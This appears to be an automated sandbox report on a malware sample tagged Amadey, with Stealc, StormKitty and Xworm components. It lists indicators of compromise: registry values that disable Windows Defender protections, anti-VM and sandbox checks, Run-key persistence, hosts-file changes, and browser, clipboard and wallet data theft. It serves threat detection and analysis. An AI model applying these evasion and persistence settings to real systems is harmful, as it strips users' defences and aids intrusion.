amadey | 74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	30b3e46c44.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	30b3e46c44.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	30b3e46c44.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	30b3e46c44.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	30b3e46c44.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/1252-3313-0x000000000AE70000-0x000000000AF90000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2J9156.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4b394g.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9feskIx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0ada70c7c7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1J17p1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3y47J.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c0641774b2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f65883a956.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	30b3e46c44.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1648	powershell.exe
1604	powershell.exe
5880	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dasald.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9feskIx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9feskIx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1J17p1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2J9156.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4b394g.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c0641774b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f65883a956.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	30b3e46c44.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0ada70c7c7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1J17p1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2J9156.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4b394g.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3y47J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3y47J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c0641774b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f65883a956.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	30b3e46c44.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0ada70c7c7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	1J17p1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	9feskIx.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
6380	powershell.exe
6556	cmd.exe

Executes dropped EXE 20 IoCs

pid	Process
4000	U0w71.exe
3520	W5n58.exe
1004	1J17p1.exe
4900	skotes.exe
1968	2J9156.exe
2308	3y47J.exe
2116	4b394g.exe
1252	9feskIx.exe
4200	694a6d94db.exe
640	c0641774b2.exe
516	f65883a956.exe
2772	b8535da000.exe
1648	30b3e46c44.exe
3228	skotes.exe
5380	0ada70c7c7.exe
3928	dasald.exe
3112	dasald.exe
6112	rar.exe
2008	skotes.exe
4596	skotes.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	2J9156.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	3y47J.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	4b394g.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	c0641774b2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	f65883a956.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	0ada70c7c7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	1J17p1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	9feskIx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	30b3e46c44.exe

Loads dropped DLL 17 IoCs

pid	Process
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe
3112	dasald.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	30b3e46c44.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	4b394g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4b394g.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f65883a956.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013848001\\f65883a956.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b8535da000.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013849001\\b8535da000.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\30b3e46c44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013850001\\30b3e46c44.exe"	skotes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	U0w71.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	W5n58.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c0641774b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013847001\\c0641774b2.exe"	skotes.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
227	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0032000000023b7f-143.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5492	tasklist.exe
5796	tasklist.exe
6936	tasklist.exe
5556	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
1004	1J17p1.exe
4900	skotes.exe
1968	2J9156.exe
2308	3y47J.exe
2116	4b394g.exe
1252	9feskIx.exe
516	f65883a956.exe
1648	30b3e46c44.exe
3228	skotes.exe
5380	0ada70c7c7.exe
2008	skotes.exe
4596	skotes.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000241d0-3289.dat	upx
behavioral1/memory/3112-3304-0x00007FF9902A0000-0x00007FF990962000-memory.dmp	upx
behavioral1/files/0x00070000000241ca-3347.dat	upx
behavioral1/files/0x00070000000241c9-3346.dat	upx
behavioral1/files/0x00070000000241c8-3345.dat	upx
behavioral1/files/0x00070000000241c7-3344.dat	upx
behavioral1/files/0x00070000000241c6-3343.dat	upx
behavioral1/files/0x00070000000241c5-3342.dat	upx
behavioral1/files/0x00070000000241c4-3341.dat	upx
behavioral1/files/0x00070000000241c2-3340.dat	upx
behavioral1/files/0x00070000000241d5-3339.dat	upx
behavioral1/files/0x00070000000241d4-3338.dat	upx
behavioral1/memory/3112-3371-0x00007FF990120000-0x00007FF99029F000-memory.dmp	upx
behavioral1/memory/3112-3370-0x00007FF994140000-0x00007FF994164000-memory.dmp	upx
behavioral1/memory/3112-3369-0x00007FF99FE30000-0x00007FF99FE49000-memory.dmp	upx
behavioral1/files/0x00070000000241cf-3397.dat	upx
behavioral1/memory/3112-3400-0x00007FF990010000-0x00007FF9900DE000-memory.dmp	upx
behavioral1/memory/3112-3419-0x00007FF98FAD0000-0x00007FF990003000-memory.dmp	upx
behavioral1/memory/3112-3396-0x00007FF9900E0000-0x00007FF990113000-memory.dmp	upx
behavioral1/memory/3112-3395-0x00007FF9A6490000-0x00007FF9A649D000-memory.dmp	upx
behavioral1/memory/3112-3394-0x00007FF99FE10000-0x00007FF99FE29000-memory.dmp	upx
behavioral1/memory/3112-3441-0x00007FF9902A0000-0x00007FF990962000-memory.dmp	upx
behavioral1/memory/3112-3444-0x00007FF98F950000-0x00007FF98FA6A000-memory.dmp	upx
behavioral1/memory/3112-3443-0x00007FF9A25D0000-0x00007FF9A25F5000-memory.dmp	upx
behavioral1/memory/3112-3440-0x00007FF9A6120000-0x00007FF9A612D000-memory.dmp	upx
behavioral1/memory/3112-3439-0x00007FF99ADC0000-0x00007FF99ADD4000-memory.dmp	upx
behavioral1/files/0x00070000000241d3-3387.dat	upx
behavioral1/memory/3112-3368-0x00007FF99FEB0000-0x00007FF99FEDC000-memory.dmp	upx
behavioral1/files/0x00070000000241cd-3333.dat	upx
behavioral1/memory/3112-3328-0x00007FF9A6A50000-0x00007FF9A6A5F000-memory.dmp	upx
behavioral1/memory/3112-3327-0x00007FF9A25D0000-0x00007FF9A25F5000-memory.dmp	upx
behavioral1/files/0x00070000000241ce-3326.dat	upx
behavioral1/files/0x00070000000241c3-3323.dat	upx
behavioral1/memory/3112-3537-0x00007FF994140000-0x00007FF994164000-memory.dmp	upx
behavioral1/memory/3112-3538-0x00007FF990120000-0x00007FF99029F000-memory.dmp	upx
behavioral1/memory/3112-3583-0x00007FF9900E0000-0x00007FF990113000-memory.dmp	upx
behavioral1/memory/3112-3585-0x00007FF98FAD0000-0x00007FF990003000-memory.dmp	upx
behavioral1/memory/3112-3589-0x00007FF990010000-0x00007FF9900DE000-memory.dmp	upx
behavioral1/memory/3112-3619-0x00007FF990120000-0x00007FF99029F000-memory.dmp	upx
behavioral1/memory/3112-3614-0x00007FF9A25D0000-0x00007FF9A25F5000-memory.dmp	upx
behavioral1/memory/3112-3613-0x00007FF9902A0000-0x00007FF990962000-memory.dmp	upx
behavioral1/memory/3112-3639-0x00007FF990010000-0x00007FF9900DE000-memory.dmp	upx
behavioral1/memory/3112-3643-0x00007FF98F950000-0x00007FF98FA6A000-memory.dmp	upx
behavioral1/memory/3112-3653-0x00007FF9900E0000-0x00007FF990113000-memory.dmp	upx
behavioral1/memory/3112-3652-0x00007FF9A6490000-0x00007FF9A649D000-memory.dmp	upx
behavioral1/memory/3112-3651-0x00007FF99FE10000-0x00007FF99FE29000-memory.dmp	upx
behavioral1/memory/3112-3650-0x00007FF990120000-0x00007FF99029F000-memory.dmp	upx
behavioral1/memory/3112-3649-0x00007FF994140000-0x00007FF994164000-memory.dmp	upx
behavioral1/memory/3112-3648-0x00007FF99FE30000-0x00007FF99FE49000-memory.dmp	upx
behavioral1/memory/3112-3647-0x00007FF9A6A50000-0x00007FF9A6A5F000-memory.dmp	upx
behavioral1/memory/3112-3646-0x00007FF9A25D0000-0x00007FF9A25F5000-memory.dmp	upx
behavioral1/memory/3112-3645-0x00007FF99FEB0000-0x00007FF99FEDC000-memory.dmp	upx
behavioral1/memory/3112-3644-0x00007FF9902A0000-0x00007FF990962000-memory.dmp	upx
behavioral1/memory/3112-3642-0x00007FF9A6120000-0x00007FF9A612D000-memory.dmp	upx
behavioral1/memory/3112-3641-0x00007FF99ADC0000-0x00007FF99ADD4000-memory.dmp	upx
behavioral1/memory/3112-3640-0x00007FF98FAD0000-0x00007FF990003000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1J17p1.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
468	5380	WerFault.exe	124
5960	1252	WerFault.exe	91

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9feskIx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f65883a956.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b8535da000.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	U0w71.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1J17p1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3y47J.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	b8535da000.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30b3e46c44.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c0641774b2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	b8535da000.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0ada70c7c7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	W5n58.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2J9156.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4b394g.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	694a6d94db.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
7112	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
6944	systeminfo.exe

Kills process with taskkill 14 IoCs

pid	Process
4784	taskkill.exe
5624	taskkill.exe
6124	taskkill.exe
1160	taskkill.exe
2896	taskkill.exe
2228	taskkill.exe
4824	taskkill.exe
5968	taskkill.exe
6236	taskkill.exe
3028	taskkill.exe
3452	taskkill.exe
1648	taskkill.exe
4488	taskkill.exe
5252	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1252	9feskIx.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
1004	1J17p1.exe
1004	1J17p1.exe
4900	skotes.exe
4900	skotes.exe
1968	2J9156.exe
1968	2J9156.exe
2308	3y47J.exe
2308	3y47J.exe
2116	4b394g.exe
2116	4b394g.exe
1252	9feskIx.exe
1252	9feskIx.exe
2116	4b394g.exe
2116	4b394g.exe
516	f65883a956.exe
516	f65883a956.exe
2772	b8535da000.exe
2772	b8535da000.exe
1648	30b3e46c44.exe
1648	30b3e46c44.exe
3228	skotes.exe
3228	skotes.exe
1648	30b3e46c44.exe
1648	30b3e46c44.exe
1648	30b3e46c44.exe
2772	b8535da000.exe
2772	b8535da000.exe
1252	9feskIx.exe
1252	9feskIx.exe
5380	0ada70c7c7.exe
5380	0ada70c7c7.exe
5880	powershell.exe
5880	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
5880	powershell.exe
6380	powershell.exe
6380	powershell.exe
6380	powershell.exe
1604	powershell.exe
1604	powershell.exe
6380	powershell.exe
6380	powershell.exe
2008	skotes.exe
2008	skotes.exe
4596	skotes.exe
4596	skotes.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2116	4b394g.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	4992	firefox.exe
Token: SeDebugPrivilege	4992	firefox.exe
Token: SeDebugPrivilege	1648	30b3e46c44.exe
Token: SeDebugPrivilege	1252	9feskIx.exe
Token: SeDebugPrivilege	5880	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	5796	tasklist.exe
Token: SeDebugPrivilege	5492	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6892	WMIC.exe
Token: SeSecurityPrivilege	6892	WMIC.exe
Token: SeTakeOwnershipPrivilege	6892	WMIC.exe
Token: SeLoadDriverPrivilege	6892	WMIC.exe
Token: SeSystemProfilePrivilege	6892	WMIC.exe
Token: SeSystemtimePrivilege	6892	WMIC.exe
Token: SeProfSingleProcessPrivilege	6892	WMIC.exe
Token: SeIncBasePriorityPrivilege	6892	WMIC.exe
Token: SeCreatePagefilePrivilege	6892	WMIC.exe
Token: SeBackupPrivilege	6892	WMIC.exe
Token: SeRestorePrivilege	6892	WMIC.exe
Token: SeShutdownPrivilege	6892	WMIC.exe
Token: SeDebugPrivilege	6892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6892	WMIC.exe
Token: SeRemoteShutdownPrivilege	6892	WMIC.exe
Token: SeUndockPrivilege	6892	WMIC.exe
Token: SeManageVolumePrivilege	6892	WMIC.exe
Token: 33	6892	WMIC.exe
Token: 34	6892	WMIC.exe
Token: 35	6892	WMIC.exe
Token: 36	6892	WMIC.exe
Token: SeDebugPrivilege	6380	powershell.exe
Token: SeDebugPrivilege	6936	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6892	WMIC.exe
Token: SeSecurityPrivilege	6892	WMIC.exe
Token: SeTakeOwnershipPrivilege	6892	WMIC.exe
Token: SeLoadDriverPrivilege	6892	WMIC.exe
Token: SeSystemProfilePrivilege	6892	WMIC.exe
Token: SeSystemtimePrivilege	6892	WMIC.exe
Token: SeProfSingleProcessPrivilege	6892	WMIC.exe
Token: SeIncBasePriorityPrivilege	6892	WMIC.exe
Token: SeCreatePagefilePrivilege	6892	WMIC.exe
Token: SeBackupPrivilege	6892	WMIC.exe
Token: SeRestorePrivilege	6892	WMIC.exe
Token: SeShutdownPrivilege	6892	WMIC.exe
Token: SeDebugPrivilege	6892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6892	WMIC.exe
Token: SeRemoteShutdownPrivilege	6892	WMIC.exe
Token: SeUndockPrivilege	6892	WMIC.exe
Token: SeManageVolumePrivilege	6892	WMIC.exe
Token: 33	6892	WMIC.exe
Token: 34	6892	WMIC.exe
Token: 35	6892	WMIC.exe
Token: 36	6892	WMIC.exe
Token: SeDebugPrivilege	5556	tasklist.exe
Token: SeDebugPrivilege	5624	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	6124	taskkill.exe
Token: SeDebugPrivilege	5968	taskkill.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1004	1J17p1.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
4992	firefox.exe
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
2772	b8535da000.exe
2772	b8535da000.exe
2772	b8535da000.exe
